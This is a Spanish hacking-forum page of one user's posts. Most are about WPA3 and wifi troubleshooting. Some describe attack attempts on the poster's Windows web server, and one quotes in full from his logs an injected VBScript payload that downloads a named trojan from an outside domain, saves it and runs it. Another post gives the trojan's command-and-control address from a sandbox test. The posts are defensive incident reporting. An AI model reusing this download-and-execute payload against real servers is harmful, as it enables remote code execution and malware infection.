Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - warcry.

#501
Hacking Wireless / ¿Que es esto del WPA3?
15 Enero 2018, 12:31 PM
En este artículo voy a tratar de explicar que podemos esperar de este nuevo sistema de seguridad.


La Wi-Fi Alliance, que es un conjunto de empresas, ha informado recientemente de un nuevo sistema de seguridad, que podría entrar en funcionamiento este mismo año. No han especificado las nuevas características de este sistema WPA3, por lo que vamos a ciegas.

Analicemos pues lo poco que sabemos, han dicho que aumentarán el cifrado que pasará a 192 bits, ya que el actual cifrado, por métodos de ataque distribuido se vio que podía ser crackeado en un tiempo relativamente viable.

Pero a parte de este aumento en la seguridad de cifrado, que podemos esperar, en principio prometen un sistema de negociación de clave que haga inútil los sistemas actuales de ataque por diccionario contra un handshake, lo que haría que claves poco seguras, bien por su longitud, bien por ser de las más comunes, fueran robustas al no poder probarlas contra un handshake. Pero y ¿los "releavers"? uno de mis script "Airlin" prueba claves contenidas en un diccionario contra el router directamente, luego seguirían siendo eficaces. Luego que nadie se confíe, las claves poco seguras, seguirán siendo poco seguras.

Ahora vienen donde la matan, no han entrado en detalle pero dicen que implantarán un sistema de privacidad de redes abiertas mediante el cifrado de datos individual. Luego hasta el Punto de Acceso tengo un cifrado de datos individual, con eso que evito, pues solamente que quien este escuchando en esa red coja los datos que puedan viajar en claro, que a día de hoy son pocos ya que casi todas las conexiones utilizan el protocolo https, luego es poner una capa de cifrado mas, ¿pero entonces esto realmente vale para algo? Pues no, ya que no previene los ataques MITM ya que se seguirá pudiendo envenenar la red y hacer que todo el tráfico pase por donde queramos.

Y por último anuncian un nuevo proceso simplificado para configurar la seguridad, especialmente accesible para dispositivos con una interface con una visualización limitada o incluso nula. Aquí es cuando me cago de miedo, la última implementación de un sistema simplificado para el usuario fue el WPS, con la cagada en mayúsculas que hicieron, así que preveo que los futuros fallos que se encuentren al WPA3 vendrán de la explotación de este "sistema simplificado".

¿Qué pasará con nuestro hardware? Ordenadores, routers, repetidores, etc. Sin conocer las especificaciones en concreto, con una actualización en los firmwares debería ser suficiente, pero no se por que tengo la sensación, que la Wi-Fi Alliance, intentará implementar algo, aunque no valga para nada, para forzar al usuario a un cambio de equipos, que es con lo que ganan dinero las empresas fabricantes, ya que con la actualización de firmwares no.

Por todo lo expuesto anteriormente, yo no recomendaría el volverse loco con el tema de WPA3 y hacer una inversión ingente de dinero en actualizarse, ya que puede ser peor el remedio que la enfermedad, y todavía podemos aguantar con un sistema WPA2 que ya tiene unos 14 años y que en principio la vulnerabilidad de la negociación del handshake de 4 vías ha sido parcheada sin mayores consecuencias.

fuente yo  ;D
#502
porque la intel sera compatible con el modo N y la alfa H no  :silbar:

Mod: Editadas partes del mensaje que sobran.
#503
Bueno, hoy he estado haciendo mis pruebas.

he creado una sandbox y he ejecutado el archivo malicioso "server.exe" desde la ubicación teórica de descarga Shell.Run ("c:\server.exe")

teniendo en cuenta que no soy ningun experto en analisis de malware, mis impresiones generales son:

1. El archivo al ejecutarse permanece en el directorio, en este caso C: luego no se esconde.

2. El proceso se para facilmente desde el administrador de tareas luego no es pegajoso

3. Abre una conexion a la ip 202.124.205.33

server.exe 4244 TCP 192.168.226.132 49936 202.124.205.33 6380 SYN_SENT

4. Los datos de esa ip son:

Dirección IP: 202.124.205.33
AS Number (ASN): AS17553 Bogor Agricultural University
Organización: Bogor Agricultural University
Dominio:
DNS: 202.124.205.33
Pais: Indonesia
Código País: id
Bandera: Click para ver la bandera en grande
Nombre Región: Jawa Barat
País Original: Indonesia
Ciudad: Bekasi
Código ZIP: 17148
Diferencia Horaria: +07:00
Ips vinculadas: 202.124.205.33


El ataque provenía de una ip china, luego ese servidor de una universidad indonesia, podría ser un server comprometido y manejado por los chinos, para que directamente el troyano no les apunte a ellos.

En definitiva, a priori el ataque no ha tenido éxito, lo que no he conseguido reproducir es el log en mi servidor, lo que me tiene un poco mosca pero bueno. Creo que es un ataque que explota malas configuraciones de apache sobre windows server.

si algún experto se digna a analizar el bicho y aporta mas detalles se lo agradecería, parece un troyano en toda regla, pero como digo no soy conocedor del mundo del malware




#504
Cita de: engel lex en 12 Enero 2018, 20:25 PM

no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban

en principio no tengo habilitada la opcion de ejecucion de scripts en el servidor, luego en teoria no deberia poder ejecutarse el "Wscript.Shell"

a parte he baneado todo el rango de ips del atacante 117.60.0.0 - 117.63.255.255

pero siempre te quedas con la mosca detrás de la oreja, por eso quería saber que hace exactamente el server.exe.

a ver si mañana por la mañana me pongo un rato y creo una sandbox.

esta noche si recibís desde mi ip ataques, recordad que igual soy un zombie, no soy yo  ;D
#505
bueno he tenido dos intentonas de ejecucion de codigo en el log del servidor

6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}


esa de las 6:12 de la mañana y otra a las 7:17

en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.

también la segunda intentona supongo que seria porque la primera no ha cuajado.

desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi

9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000


el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.

en principio creo que no, pero estoy con la mosca.

cuando tenga un poco de tiempo intento una conexión desde una shell de linux

en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor

thanx


#506
lee sobre "envenenar" la red
#507
Hacking Wireless / Re: Ayuda con red wifi
12 Enero 2018, 18:31 PM
Si cambiaste el router hace 1 semana ¿que casualidad no te parece?

mira los valores de la MTU

https://www.adslayuda.com/generico-mtu.html

por regla general un buen valor es 1400

mira también en que modo esta, b,g,n, only n etc

y el ancho de banda de canal, si tiene mucho ancho de banda es probable que tambien te de problemas por eso, bajaselo a 20 Mhz

http://www.cablex.es/noticia/la-importancia-de-elegir-20mhz-o-40mhz-de-ancho-de-canal-wifi
#508
Que tengas en modo monitor o promiscuo la tarjeta  no es suficiente para capturar trafico que no sea broadcast con wireshark.

hay que hacer mas cosas si quieres ver el trafico http de un dispositivo en concreto.
#509
Hacking Wireless / Re: Ayuda con red wifi
12 Enero 2018, 15:18 PM
si en otro sitio no te pasa, entonces el problema lo tienes en el router, bien porque ya sea viejecete y este dando problemas o tenga una mala configuracion, o bien porque te están haciendo la puñeta.

lo mas seguro es que sea la primera opción.
#510
pufff, sobre explotación de la saga.

y que todavía haya gente que juege a estos fakes  :¬¬